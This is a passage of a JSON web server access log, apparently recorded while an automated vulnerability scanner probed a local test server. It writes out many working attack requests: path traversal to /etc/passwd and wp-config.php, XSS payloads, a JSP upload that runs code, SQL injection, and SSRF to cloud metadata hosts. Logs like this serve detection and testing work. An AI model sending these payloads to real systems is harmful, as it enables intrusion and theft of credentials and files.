HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/super-forms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2212.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/admin/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm/ess.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sftp-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MFfb0SuuNLDpsoeGS0DnCzMI/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22csrf_token\x22\x0D\x0A\x0D\x0A{{csrf}}\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MFkf2mFh6lMjCD4iqaBNajAa.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x0D\x0A \x22type\x22: \x22297MFkf2mFh6lMjCD4iqaBNajAa\x22\x0D\x0A}\x0D\x0A\x0D\x0A------WebKitFormBoundaryB874qcjbpxTP1Hj7--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /variable/varimport HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/admin/variable/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/plugins_listing HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/297MFjJUNDUc6MZWtS0yGJlHehU.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"alibaba.interact.sh","request":"GET http://alibaba.interact.sh/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dfshealth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=probes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /session HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"100.100.100.200","request":"GET http://100.100.100.200/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":" \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_async/AsyncResponseService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect-to?url=https%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 